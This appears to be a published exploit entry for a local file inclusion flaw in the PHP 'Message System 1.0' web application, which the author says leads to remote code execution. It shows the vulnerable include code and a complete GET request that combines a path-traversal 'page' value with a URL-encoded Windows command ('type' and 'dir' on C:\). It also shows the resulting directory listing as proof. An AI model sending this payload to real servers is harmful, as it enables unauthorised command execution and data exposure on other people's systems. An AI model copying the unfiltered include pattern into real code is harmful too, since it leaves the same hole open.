id: 37555
date: 03/30/2022
title: Message System 1.0 Local File Inclusion Vulnerability
author: Hejap Zairy
cves: 

# Title:  Message System 1.0  LFI To RCE
# Author: Hejap Zairy
# Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html
# Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache



#vulnerability Code  php
Needs more filtering require_once

```
require_once('config.php');
$page = isset($_GET['page']) ? $_GET['page'] : 'registration';
$page_name = explode("/",$page)[count(explode("/",$page)) -1];
```

[+] Payload GET


```
GET /pmms/registration?page=../../../0day&515=%74%79%70%65%20%43%3a%5c%30%64%61%79%5f%48%65%6a%61%70%5f%2e%74%78%74%20%26%26%20%64%69%72%20%43%3a%5c HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 354
Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg
Upgrade-Insecure-Requests: 1
```


#Status: CRITICAL

#Response 
```

Hegap Zairy 0day Volume in drive C is OS
Volume Serial Number is 2EF1-9DCA

 Directory of C:\

03/18/2022  10:27 AM    <DIR>          Program Files
03/21/2022  01:45 PM    <DIR>          Program Files (x86)
03/02/2022  11:04 PM    <DIR>          Python27
03/26/2022  08:33 PM    <DIR>          Temp
03/26/2022  08:45 PM    <DIR>          Users

```



# Description:
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce


# Proof and Exploit:
https://i.imgur.com/jTqaEXn.png

#  0day.today [2023-03-25]  #